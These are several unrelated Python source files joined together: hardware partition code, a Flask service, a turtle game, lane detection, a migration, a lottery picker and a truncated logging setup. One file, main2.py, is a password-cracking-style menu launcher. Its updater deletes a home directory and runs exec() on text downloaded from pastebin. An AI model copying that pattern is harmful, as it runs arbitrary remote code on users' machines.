Partition. pre vertex\") from ex\n # add\n super().add_edge(edge)\n\n @sdram_base_address.setter\n def sdram_base_address(self, new_value):\n if len(self.pre_vertices) != len(self.edges):\n raise PartitionMissingEdgesException(\n f\"There are {len(self.pre_vertices)} pre vertices \"\n f\"but only {len(self.edges)} edges\")\n\n self._sdram_base_address = new_value\n\n for pre_vertex in self._pre_vertices.keys():\n # allocate for the pre_vertex\n edge = self._pre_vertices[pre_vertex].peek()\n edge.sdram_base_address = new_value\n new_value += edge.sdram_size\n\n @overrides(AbstractSDRAMPartition.get_sdram_base_address_for)\n def get_sdram_base_address_for(self, vertex):\n if self._sdram_base_address is None:\n return None\n if vertex in self._pre_vertices:\n edge = self._pre_vertices[vertex].peek()\n return edge.sdram_base_address\n else:\n return self._sdram_base_address\n\n @overrides(AbstractSDRAMPartition.get_sdram_size_of_region_for)\n def get_sdram_size_of_region_for(self, vertex):\n if vertex in self._pre_vertices:\n edge = self._pre_vertices[vertex].peek()\n return edge.sdram_size\n else:\n return self.total_sdram_requirements()\n","sub_path":"pacman/model/graphs/machine/source_segmented_sdram_machine_partition.py","file_name":"source_segmented_sdram_machine_partition.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562056987","text":"from app.main import db\nfrom app.main.models.objective_questions import ObjectiveQuestions\nfrom app.main.models.submission_objective import SubmissionObjective\nfrom flask import jsonify\n\ndef take_test(data):\n \"\"\"[summary]\n \n Returns:\n [type]: [description]\n \"\"\"\n student_id = int(data[\"student_id\"])\n quiz_test_id = data[\"test_id\"]\n query = db.session.query(ObjectiveQuestions).filter_by(quiz_test_id=quiz_test_id)\n items = []\n for i in query:\n items.append({\"student_id\":student_id,\"quiz_test_id\":i.quiz_test_id,\"question_id\":i.question_id,\"marks\":i.marks})\n for i in range(len(items)):\n new_submission = SubmissionObjective(\n student_id = items[i]['student_id'],\n question_id = items[i]['question_id'],\n quiz_test_id = items[i]['quiz_test_id'],\n marks = items[i]['marks']\n )\n db.session.add(new_submission)\n db.session.commit()\n response_object = jsonify({\"response\": \"successfully added\"})\n return response_object, 200","sub_path":"src/server/app/main/services/take_test.py","file_name":"take_test.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435824717","text":"import random\nimport turtle as t\nfrom turtle import Turtle\n\ndef turn_right(): #오른쪽 화살키\n t.setheading(0)\n t.forward(10)\n\ndef turn_up(): #위쪽 화살키\n t.setheading(90)\n t.forward(10)\n\ndef turn_left(): #왼쪽 화살키\n t.setheading(180)\n t.forward(10)\n\ndef turn_down(): #아래쪽 화살키\n t.setheading(270)\n t.forward(10)\n\ndef play():\n t.forward(10)\n te.forward(9)\n #적거북이가 주인공을 쫓아감\n ang=te.towards(t.pos())\n te.setheading(ang)\n #주인공 거북이가 먹이에 닿으면 먹이가 랜덤하게 이동\n if t.distance(tf) < 12:\n x = random.randint(-230,230)\n y = random.randint(-230,230)\n tf.goto(x,y)\n if t.distance(te) < 12:\n t.ontimer(play, 100) #0.1초\n\n#메인영역\nt.setup(500,500) #너비,높이\nt.title(\"달려라 거북이\")\nt.speed(0)\nt.up()\nt.color('white')\nt.bgcolor('black')\nt.shape('turtle')\n\n#적 거북이\nte = t.Turtle() #Turtle() 클래스에서 te인스턴스 생성\nte.shape('turtle')\nte.color('yellow')\nte.speed(0)\nte.up()\nte.goto(0,200)\n\n#먹이\ntf = t.Turtle()\ntf.shape('circle')\ntf.color('blue')\ntf.shapesize(0.7)\ntf.up()\ntf.goto(0,-200)\n\nt.onkeypress(turn_right,\"Right\")\nt.onkeypress(turn_left,\"Left\")\nt.onkeypress(turn_up,\"Up\")\nt.onkeypress(turn_down,\"Down\")\nt.listen() #키보드의 동작을 기다림\nplay()\n\nt.mainloop()","sub_path":"run_turtle/run_turtle.py","file_name":"run_turtle.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"516437460","text":"\"\"\"============================================================================\nPART 05. curved_lanes.py\n============================================================================\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\n\"\"\"============================================================================\nPROCEDURE:\n find_curvature\nPARAMETERS:\n img, a perspective-transformed binary image\nPURPOSE:\n calculate best-fit polynomials for left and right lanes as detected from\n the binary image given\nPRODUCES:\n fit_polynomial, a tuple holding polynomials for left and right lanes as\n well as 0 or 1 to indicate whether window center points were used.\n e.g. when center points were used : (ctr_left_fit, ctr_right_fit, 1)\n when nonzero pixels were used: (left_fit, right_fit, 0)\n============================================================================\"\"\"\ndef find_curvature(img):\n\n # Histogram can help us determine the intensity of white pixels(255)\n # - As pixel values are summed up vertically, regions where lanes lie \n # will have significantly higher peaks (x-axis:width, y-axis:sum)\n # - Mostly two peaks; one on the left and one the right\n # - Summing up values in the lower half of the image\n histogram = np.sum(img[img.shape[0]//2:,:], axis=0)\n\n # Create an output image for result visualization\n # img.shape = (670, 1280); out_img.shape = (670, 1280, 3)\n # out_img = np.dstack((img, img, img))*255\n\n # Calculate the midpoint of width of histogram\n midpoint = np.int(histogram.shape[0] // 2)\n\n # Calculate the max on the left and right side of the midpoint\n # - this value will be the x value of the peak point\n left_peak_x = np.argmax(histogram[:midpoint])\n right_peak_x = np.argmax(histogram[midpoint:]) + midpoint\n\n # - distance between them should be at least 700 and at most 850 pixels\n # to ensure that they are lanes (if not, set arbitrary x value)\n if ((right_peak_x - left_peak_x) < 700 or \n (right_peak_x - left_peak_x) > 850):\n left_peak_x = 275\n right_peak_x = 1100\n print(\"Lane Distance reconfigured.\")\n\n # Set the number of sliding windows\n window_num = 9\n\n # Set the window height\n window_height = np.int(img.shape[0] // window_num)\n\n # Identify x and y coordinates of all nonzero pixels in the image\n nonzero = img.nonzero() # nonozero = ((array), (array))\n nonzero_x = np.array(nonzero[1]) # x coordinates of nonzero pixels\n nonzero_y = np.array(nonzero[0]) # y coordinates of nonzero pixels\n\n # Current positions to be updated for each sliding window\n # First begin at the x value of the histogram peak point\n left_x_current = left_peak_x\n right_x_current = right_peak_x\n\n # Set the width of the windows +/- margin\n margin = 60\n\n # Set minimum number of pixels found to recenter window\n min_pix = 40\n\n # Count the number of times windows have been recentered\n num_win_moved_left = 0\n num_win_moved_right = 0\n\n # Create empty lists to receive left and right lane pixel indices\n left_lane_index = []\n right_lane_index = []\n\n # Create empty ndarray to store window center points\n win_ctr_x_left = np.array([]) # x val of center point on left\n win_ctr_x_right = np.array([]) # x val of center point on right\n win_ctr_y = np.array([]) # y val of center point (same for both)\n\n # For each sliding window\n for window in range(window_num):\n\n # Identify window boundaries in x and y (for right and left side)\n win_y_low = img.shape[0] - (window + 1) * window_height\n win_y_high = img.shape[0] - window * window_height\n \n win_x_left_low = left_x_current - margin\n win_x_left_high = left_x_current + margin\n \n win_x_right_low = right_x_current - margin\n win_x_right_high = right_x_current + margin\n\n # Draw the windows on the visualization image\n # cv2.rectangle(out_img, (win_x_left_low, win_y_low),\n # (win_x_left_high, win_y_high),\n # (0,255,0), 2)\n\n # cv2.rectangle(out_img, (win_x_right_low, win_y_low), \n # (win_x_right_high, win_y_high),\n # (0,255,0), 2) \n\n # (win_x_left_low, win_y_low) \n # OR\n # (win_x_right_low, win_y_low)\n # o --------\n # | |\n # -------- o \n # (win_x_left_high, win_y_high)\n # OR\n # (win_x_right_high, win_y_high)\n\n # Identify indices of the nonzero pixels within the current window\n good_left_inds = ((nonzero_y >= win_y_low) &\n (nonzero_y < win_y_high) & \n (nonzero_x >= win_x_left_low) & \n (nonzero_x < win_x_left_high)).nonzero()[0]\n \n good_right_inds = ((nonzero_y >= win_y_low) & \n (nonzero_y < win_y_high) & \n (nonzero_x >= win_x_right_low) & \n (nonzero_x < win_x_right_high)).nonzero()[0]\n\n # Add these indices to the lists\n left_lane_index.append(good_left_inds)\n right_lane_index.append(good_right_inds)\n\n # If exceeds min_pix, recenter next window on their mean x position\n # - nonzero_x[good_left_inds] = all x values of nonzero pixels \n # in the current window on the left\n if len(good_left_inds) > min_pix:\n left_x_current = np.int(np.mean(nonzero_x[good_left_inds]))\n num_win_moved_left += 1\n\n if len(good_right_inds) > min_pix: \n right_x_current = np.int(np.mean(nonzero_x[good_right_inds]))\n num_win_moved_right += 1\n \n # Append the center points to the existing array\n win_ctr_x_left = np.append( win_ctr_x_left,\n (win_x_left_high + win_x_left_low)//2 ) \n \n win_ctr_x_right = np.append( win_ctr_x_right,\n (win_x_right_high + win_x_right_low)//2 )\n\n win_ctr_y = np.append( win_ctr_y,\n (win_y_high + win_y_low)//2 ) \n\n # Concatenate the arrays of indices into one large array\n left_lane_index = np.concatenate(left_lane_index)\n right_lane_index = np.concatenate(right_lane_index)\n\n # All the xy-coordinates of nonzero pixels within all windows\n # - these points will later be colored red and blue\n left_nz_x = nonzero_x[left_lane_index]\n left_nz_y = nonzero_y[left_lane_index] \n\n right_nz_x = nonzero_x[right_lane_index]\n right_nz_y = nonzero_y[right_lane_index]\n \n # =================================================\n # This part is specifically for cases when the number of pixels within \n # windows are not high enough to accurately produce a best fit.\n # In other words, if the majority of windows do not recenter, which\n # can be determined by num_win_moved_right/left, this suggests that \n # there are not enough significant pixels around to determine the \n # general direction of a lane. Hence, I decided that it is safer to\n # rely on the best-fit line based on center points of all windows.\n\n # Compute a second-order polynomial for best-fit line \n # through the window center points\n if num_win_moved_left <= 4 or num_win_moved_right <= 4:\n ctr_left_fit = np.polyfit(win_ctr_y, win_ctr_x_left, 2)\n ctr_right_fit = np.polyfit(win_ctr_y, win_ctr_x_right, 2)\n \n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n # plot_y2 = np.linspace(0, img.shape[0]-1, img.shape[0])\n \n # - all x coordinates of the best-fit line calculated above\n # left_fit_x2 = (ctr_left_fit[0] * plot_y2**2 + \n # ctr_left_fit[1] * plot_y2 + \n # ctr_left_fit[2])\n\n # right_fit_x2 = (ctr_right_fit[0] * plot_y2**2 + \n # ctr_right_fit[1] * plot_y2 + \n # ctr_right_fit[2])\n\n # Visualize all nonzero pixels outside windows\n # out_img[nonzero_y, nonzero_x] = [255, 255, 255] # white : others\n \n # Visualize all nonzero pixels inside windows\n # out_img[left_nz_y, left_nz_x] = [255, 0, 0] # red: left\n # out_img[right_nz_y, right_nz_x] = [0, 0, 255] # blue: right\n\n # plt.imshow(out_img)\n \n # Plot the best-fit line for left and right lane\n # plt.plot(left_fit_x2, plot_y2, color='magenta')\n # plt.plot(right_fit_x2, plot_y2, color='magenta')\n\n # Set x and y axis boundaries\n # plt.xlim(0, img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n fit_polynomial = (ctr_left_fit, ctr_right_fit, 1)\n print(\"best-fit performed using center-points.\")\n\n return fit_polynomial\n\n # =================================================\n # Otherwise, \n else:\n # Compute a second-order polynomial for best-fit line \n # through the nonzero pixels found above \n left_fit = np.polyfit(left_nz_y, left_nz_x, 2)\n right_fit = np.polyfit(right_nz_y, right_nz_x, 2)\n\n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n # plot_y = np.linspace(0, img.shape[0]-1, img.shape[0]) \n\n # - all x coordinates of the best-fit line calculated above\n # left_fit_x = ( left_fit[0] * plot_y**2 + \n # left_fit[1] * plot_y + \n # left_fit[2])\n # right_fit_x = ( right_fit[0]* plot_y**2 + \n # right_fit[1]* plot_y + \n # right_fit[2])\n\n # Visualize all nonzero pixels outside windows\n # out_img[nonzero_y, nonzero_x] = [255, 255, 255] # white : others\n\n # Visualize all nonzero pixels inside windows\n # out_img[left_nz_y, left_nz_x] = [255, 0, 0] # red: left\n # out_img[right_nz_y, right_nz_x] = [0, 0, 255] # blue: right\n\n # plt.imshow(out_img)\n\n # Plot the best-fit line for left and right lane\n # plt.plot(left_fit_x, plot_y, color='yellow')\n # plt.plot(right_fit_x, plot_y, color='yellow')\n\n # Set x and y axis boundaries\n # plt.xlim(0, img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n fit_polynomial = (left_fit, right_fit, 0)\n\n return fit_polynomial\n\n\"\"\"============================================================================\nPROCEDURE:\n find_curved_lanes\nPARAMETERS:\n img, \n polynomial,\nPURPOSE:\n uses the best-fit polynomial from find_curvature() to find another \n best-fit line based on nonzero pixels within margins and generate plot data\n points to draw the curved lanes\nPRODUCES:\n - plot_data, a tuple that contains plotting points for y values, left-fit \n x values, and right-fit x values. (ploty, left_fitx, right_fitx)\n - fit_data, a tuple that contains polynomial information for left and right\n best-fit lines. (left_fit, right_fit)\n============================================================================\"\"\"\ndef find_curved_lanes(img, polynomial):\n\n # Set the lane margin\n margin = 100\n\n # Identify x and y coordinates of all nonzero pixels in the image\n nonzero = img.nonzero() # nonozero = ((array), (array))\n nonzero_x = np.array(nonzero[1]) # x coordinates of nonzero pixels\n nonzero_y = np.array(nonzero[0]) # y coordinates of nonzero pixels\n\n # Attain best-fit polynomial information from the given parameter\n left_fit, right_fit, used_cp = polynomial\n\n # Determine whether the nonzero pixels lie within the lane margin\n # - array of booleans\n left_lane_inds = ((nonzero_x > (left_fit[0] * (nonzero_y**2) + \n left_fit[1] * nonzero_y + \n left_fit[2] - margin)) & \n (nonzero_x < (left_fit[0] * (nonzero_y**2) + \n left_fit[1] * nonzero_y + \n left_fit[2] + margin)) ) \n\n right_lane_inds = ((nonzero_x > (right_fit[0] * (nonzero_y**2) + \n right_fit[1] * nonzero_y + \n right_fit[2] - margin)) & \n (nonzero_x < (right_fit[0] * (nonzero_y**2) + \n right_fit[1] * nonzero_y + \n right_fit[2] + margin)) ) \n\n # All the xy-coordinates of nonzero pixels within the lane margins\n left_nz_x = nonzero_x[left_lane_inds]\n left_nz_y = nonzero_y[left_lane_inds] \n\n right_nz_x = nonzero_x[right_lane_inds]\n right_nz_y = nonzero_y[right_lane_inds]\n\n # If left/right_fit did not use center points in find_curvature()\n # (ie. used nonzero pixels), then find best-fit based on nonzero pixels\n # within the margins specified above \n if not used_cp:\n\n # Compute a second-order polynomial for best-fit line \n # through the nonzero pixels found within the margins \n left_fit = np.polyfit(left_nz_y, left_nz_x, 2)\n right_fit = np.polyfit(right_nz_y, right_nz_x, 2)\n \n # Otherwise, use the left/right_fit directly given from the param\n # - this is the best-fit based on window center points\n\n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n ploty = np.linspace(0, img.shape[0]-1, img.shape[0])\n\n # - all x coordinates of the best-fit line calculated above\n left_fitx = left_fit[0] * ploty**2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty**2 + right_fit[1] * ploty + right_fit[2]\n\n # Create a blank image\n # window_img = np.zeros_like(out_img)\n\n # Create two lines to bound the highlighted region\n # then change the x and y points into a valid format for fillPoly()\n\n # np.vstack() --> [ [x0, x1, x2, ..., xn] | left_fitx - margin, \n # [y0, y1, y2, ..., yn] ] | ploty\n # np.transpose() --> [ [x0, y0], | reverses axis\n # [x1, y1],\n # [x2, y2],\n # ... ...\n # [xn, yn] ]\n # np.flipud() --> [ [xn, yn], | reverses order\n # ... ... \n # [x2, y2],\n # [x1, y1],\n # [x0, y0] ]\n\n # left_line_pts after np.hstack()\n # [ [x0, y0], | left_line_window1 \n # [x1, y1], \n # [x2, y2], \n # ... ... \n # [xn, yn], \n # [xn, yn], | left_line_window2 \n # ... ... \n # [x2, y2],\n # [x1, y1],\n # [x0, y0] ] | valid format for cv2.fillPoly()\n\n # left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, \n # ploty] ))])\n\n # left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx +\n # margin, \n # ploty])))])\n\n # left_line_pts = np.hstack((left_line_window1, left_line_window2))\n\n # right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin,\n # ploty] ))])\n\n # right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + \n # margin, \n # ploty])))])\n\n # right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n # cv2.fillPoly(window_img, np.int_([left_line_pts]), (0,255, 0))\n # cv2.fillPoly(window_img, np.int_([right_line_pts]), (0,255, 0))\n\n # Blend the highlighted margin window to original image\n # result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n # plt.imshow(result)\n\n # plt.plot(left_fitx, ploty, color='yellow')\n # plt.plot(right_fitx, ploty, color='yellow')\n\n # Set x and y axis boundaries\n # plt.xlim(0, img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n plot_data = (ploty, left_fitx, right_fitx)\n fit_data = (left_fit, right_fit)\n\n return plot_data, fit_data\n\n# Note to self:\n# - find_curvature() displays yellow best-fit line based on all nonzero pixels\n# that lie within the windows.\n# - on the other hand, find_curved_lane() utilizes best-fit line based on\n# all nonzero pixels that lie within the margin=100 (wider than window)\n# - hence, the two best-fit lines are indeed different\n# - the difference between these two lines, however, seems indistinguishable \n# as both of them go in very similar (if not the same) direction.\n\n\"\"\"============================================================================\nPROCEDURE:\n highlight_lane\nPARAMETERS:\n src_img, a source image\n warped_img, a warped binary image\n mat_inv, an inverse transformation matrix calculated from transform_lane()\n plot_data, plotting points calculated from find_curved_lanes()\nPURPOSE:\n to draw and display the detected lanes on the actual source image\nPRODUCES:\n result, an image with detected lanes highlighted in green\n============================================================================\"\"\"\ndef highlight_lane(src_img, warped_img, mat_inv, plot_data):\n\n # Extract plotting data calculcated from find_curved_lanes()\n ploty, left_fitx, right_fitx = plot_data\n\n # Create an color image to show visualization\n warp_blank = np.zeros_like(warped_img).astype(np.uint8)\n warp_color = np.dstack((warp_blank, warp_blank, warp_blank))\n\n # Create two lines to bound the highlighted region\n # then change the x and y points into a valid format for fillPoly()\n # - same method as explained above in find_curved_lanes()\n left_line = np.array([np.transpose(np.vstack([left_fitx, \n ploty]))])\n\n right_line = np.array([np.flipud(np.transpose(np.vstack([right_fitx, \n ploty])))])\n\n lane_area = np.hstack((left_line, right_line))\n\n # Highlight the lane onto the blank warped image\n cv2.fillPoly(warp_color, np.int_([lane_area]), (0, 255, 0))\n\n # Unwarp the highlighted lane image to original image space with the\n # given inverse transformation matrix \n new_warp = cv2.warpPerspective(warp_color, mat_inv, (src_img.shape[1], \n src_img.shape[0]))\n\n # Combine the result with the original image\n result = cv2.addWeighted(src_img, 1, new_warp, 0.3, 0)\n\n # cv2.imshow(\"result\", result)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n return result\n\n\"\"\"============================================================================\n MAIN\n============================================================================\"\"\"\n# def main():\n \n# # Read image\n# img = cv2.imread(\"./ch00/lane_detection/persp_img/test9.jpg\")\n\n# # Check for any errors loading images\n# if img is None:\n# print(\"Error: Failed to load image.\")\n# sys.exit()\n\n# # Warp the lanes and binarize using the combined threshold created before\n# warped_lane, _, pers_inv = lp.transform_lane(img)\n# warped_lane_bi = lt.combined_threshold(warped_lane)\n\n# # Show warped image with gradient thresholds\n# cv2.namedWindow(\"warped_lane_bi\")\n# cv2.imshow(\"warped_lane_bi\", warped_lane_bi)\n\n# # Find curvature information from the warped image\n# fit_polynomial, _ = find_curvature(warped_lane_bi)\n\n# # Calculate and display the curved lanes on the warped image\n# plot_data = find_curved_lanes(warped_lane_bi, fit_polynomial)\n \n# highlight_lane(img, warped_lane_bi, pers_inv, plot_data)\n\n\n# if __name__ == '__main__':\n# main()","sub_path":"Part6_Radius/curved_lanes.py","file_name":"curved_lanes.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386910841","text":"version=\"2.3.6\"\n#IMPORT\nimport getpass,time,os,sys\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\n#CVALUE\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nline=yellow+\"======================================================================================================================\"+end\nspace=\" \"\nlogo=red+str(\"\"\"\n███╗░░░███╗██████╗░\n████╗░████║██╔══██╗\n██╔████╔██║██║░░██║\n██║╚██╔╝██║██║░░██║\n██║░╚═╝░██║██████╔╝\n╚═╝░░░░░╚═╝╚═════╝░\n\n░█████╗░██╗░░░░░░█████╗░███╗░░░███╗██╗███╗░░██╗\n██╔══██╗██║░░░░░██╔══██╗████╗░████║██║████╗░██║\n███████║██║░░░░░███████║██╔████╔██║██║██╔██╗██║\n██╔══██║██║░░░░░██╔══██║██║╚██╔╝██║██║██║╚████║\n██║░░██║███████╗██║░░██║██║░╚═╝░██║██║██║░╚███║\n╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝\n\n\n\n\\x1b[94m\n\n╔═══╦╗─╔╦═══╦╗╔╗╔╦═══╦╗─╔╦╗─╔╦═══╦╗──╔╗\n║╔═╗║║─║║╔═╗║║║║║╠╗╔╗║║─║║║─║║╔═╗║╚╗╔╝║\n║║─╚╣╚═╝║║─║║║║║║║║║║║╚═╝║║─║║╚═╝╠╗╚╝╔╝\n║║─╔╣╔═╗║║─║║╚╝╚╝║║║║║╔═╗║║─║║╔╗╔╝╚╗╔╝\n║╚═╝║║─║║╚═╝╠╗╔╗╔╬╝╚╝║║─║║╚═╝║║║╚╗─║║\n╚═══╩╝─╚╩═══╝╚╝╚╝╚═══╩╝─╚╩═══╩╝╚═╝─╚╝\"\"\")\n\nnotice=\"\"\ndef header():\n\tprint(logo+cyan+\"\\n\\n\\n\\t\\tDeveloped By : Md alamin\\n\\n\"+green+\"\\t\\t Version : \"+str(version)+\" \\n\\n\"+end+line+\"\\n\"+end)\ndef clear():\n os.system(\"clear || cls\")\ncount=1\nerase = '\\x1b[1A\\x1b[2K'\ncount=1\nabout=12\nx=3\nwhile x<5:\n user=str(input(red+\"\\n ?? USERNAME : \"))\n passw=str(input(green+\"\\n ☣️PASSWORD : \"))\n if user==\"alamin\" and passw==\"alamin\":\n print(\"Login Succcessfull\")\n sys.stdout.flush()\n time.sleep(2) \n os.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n x=8\n else:\n \tprint(red+\"\\n\\t⚠️username or password incorrect⚠️ \")\n \tos.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n \tx=3\nos.system(\"clear\")\nheader()\nprint(cyan+\"\\n\\t\\t[•] Checking For Updates\")\ntime.sleep(0.7)\n\n\ntry:\n\timport requests\nexcept:\n\tos.system(\"pip install requests\")\nimport requests\nr=requests.get('https://pastebin.com/4YKFarFn')\nupchck=r.text\nif upchck==version:\n\tpass\nelif upchck!=version:\n\tos.system(\"clear\")\n\theader()\n\tprint(cyan+\"\\n [°] Installing The Updated Tools. Allow Up to 10 minutes \")\n\ttime.sleep(2)\n\tos.system(\"clear\")\n\tnotice=cyan+\"\\t\\t[°] Installing Updated Tools.. \\n\"\n\theader()\n\tnotice=\"\"\n\tprint(\"\\n\")\n\tclear()\n\tnotice=cyan+\"\\t\\t[•] Backing up the Mafiya cybet king ....\"\n\theader()\n\tos.system(\"mkdir $HOME/z_updater\")\n\tos.system(\"cp -rf $HOME/z $HOME/j_updater\")\n\ttry:\n\t\tclear()\n\t\tnotice=cyan+\"\\t\\t[•] Updating the Tools....\"\n\t\theader()\n\t\tos.system(\"cd $HOME\")\n\t\tos.system(\"cd $HOME && rm -rf z \")\n\t\tprint(green)\n\t\tos.system(\"cd $HOME && https://github.com/HANTER2/z\")\n\t\t\n\t\tclear()\n\t\tnotice=green+\"\\t\\t[√] Update Successful!\"\n\t\theader()\n\t\t#os.kill(os.getppid(), signal.SIGHUP)\n\t\tos.system(\"rm -rf $HOME/z_updater\")\n\t\tfor i in range(99999999999):\n\t\t\tr2=requests.get(\"https://pastebin.com/4YKFarFn\")\n\t\t\tr=requests.get('https://pastebin.com/4YKFarFn')\n\t\t\tupchck=r.text\n\n\t\t\tos.system(\"clear\")\n\t\t\tprint(green+\"\\n\"*4+\"\\t [✓] Successfully Updated to Mafiya cyber king \"+yellow+str(upchck)+green+\" !\\n\\n\\n\\n\"+cyan+\" [•] What's New in Version \"+str(upchck)+\" ?\\n\\n\")\n\t\t\trng=r2.text\n\t\t\texec(rng)\n\t\t\tprint(yellow+\"\\n\\n\\n [•••] TerMux Restart is Required for The Update. Please Restart Termux For The Mafiya cyber king Updated Version\")\n\t\t\ta=input()\n\n\texcept:\n\t\tclear()\n\t\tnotice=red+\"\\t\\t[×] Update Failed!\"\n\t\theader()\n\t\tsjsjstshsb=input(cyan+\"\\n\\n\\t Press Enter to Restore ROC-X\")\n\t\tos.system(\"cd $HOME\")\n\t\tos.system(\"cd $HOME && mkdir z \")\n\t\tos.system(\"cd $HOME && cp -rf $HOME/i_updater/z $HOME\")\n\t\tos.system(\"rm -rf $HOME/z_updater\")\n\t\tos.system(\"python3 $HOME/z/main2.py\")\n\t\tfor i in range(99999999999):\n\t\t\tos.system(\"clear\")\n\t\t\ta=input()\n#Main Page\n\nwhile count<2:\n\tclear()\n\theader()\n\tnotice=\"\"\n\tprint(cyan+\"\\n==> Select the number of the option that you want to start from below : \")\n\tprint(\"\\n\\n[1] 6 Digit Password \\n\\n[2] 7 Digit Password \\n\\n[3] 8 Digit Password\\n\\n[4] 9 Digit Password \\n\\n[5] Contact Me\\n[6] uuuu\")\n\t\n\t\n\tmain_opt=str(input(blue+\"\\n[>] Select Your Option : \"+yellow))\n\tif main_opt==\"1\":\n\t\tos.system(\"python newfile.py\")\n\t\t\n\t\n\telif main_opt==\"2\":\n\t\tos.system(\"python newfile.py2\")\n\t\t\n\t\n\telif main_opt==\"3\":\n\t\tos.system(\"python newfile.py3 \")\n\telif main_opt==\"4\":\n\t\tos.system(\"python newfile.py4\")\n\n\telif main_opt==\"5\":\n\t\tos.system(\"xdg-open https://www.facebook.com/Mdalamin54321\")\n \t\n\t\t\n\t\t\n\telse:\n\t\tclear()\n\t\tnotice=red+\"\\t\\t[×] Wrong Option Entered!\"\n\t\tcount=1","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103621290","text":"\"\"\"empty message\n\nRevision ID: 2453c767d036\nRevises: d0c387e43ca4\nCreate Date: 2021-08-21 14:53:11.208418\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2453c767d036'\ndown_revision = 'd0c387e43ca4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('forms_field_id_fkey', 'forms', type_='foreignkey')\n op.drop_column('forms', 'field_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('forms', sa.Column('field_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('forms_field_id_fkey', 'forms', 'fields', ['field_id'], ['id'])\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/20210821_145311_.py","file_name":"20210821_145311_.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217875386","text":"#coding:utf-8\n\n'''\n\t双色球:红球 01~33 选择6个 篮球 01~16选择一个为一组\n\n\tAuthor:孔小发\n\tDatetime:2019-07-22\n'''\n\nfrom random import randint, sample\n\n\ndef display(balls):\n '''输出双色球号码'''\n for index, ball in enumerate(balls):\n if index == len(balls) - 1:\n print('|', end=' ')\n print(\"{}\".format(ball), end=' ')\n print() # 默认输出换行\n\ndef random_select():\n '''输出随机双色球号码'''\n red_balls = [i for i in range(0, 33)]\n balls = sample(red_balls, 6)\n balls.append(randint(1, 16))\n return balls\n\ndef main():\n '''主函数逻辑:决定买几注'''\n n = int(input(\"请选几注:\"))\n for _ in range(n):\n display(random_select())\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/双色球.py","file_name":"双色球.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303070302","text":"# -*- coding:utf-8 -*-\n# ___________________________\n# < Is this really happening? >\n# ---------------------------\n# \\ ^__^\n# \\ (oo)\\_______\n# (__)\\ )\\/\\\n# ||----w |\n# || ||\n\nfrom time import sleep\nimport argparse\n\ndef load_config():\n import yaml\n with open('config.yml') as config_file:\n config = yaml.load(config_file, Loader=yaml.FullLoader)\n return config\n\nconfig = load_config()\n\nimport logging\nimport sys\nlogger = logging.getLogger()\n# it's very import to keep daemon running\nlogger.propagate = False\nhandler = logging.FileHandler(config[\"base_config\"][\"log_file\"])\nformatter = logging.Formatter(\n '%(asctime)s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nlog_level_config = config[\"base_config\"][\"log_level\"]\nassert log_level_config in ['DEBUG', 'INFO', 'WARNING', 'ERROR']\nif log_level_config == 'DEBUG':\n log_level = logging.DEBUG\nelif log_level_config == 'INFO':\n log_level = logging.INFO\nelif log_level_config == 'WARNING':\n log_level = logging.WARNING\nelif log_level_config == 'ERROR':\n log_level = logging.ERROR \n\nlogger.setLevel(log_level)\n\nkeep_fds = [handler.stream.fileno()]\n\ndef 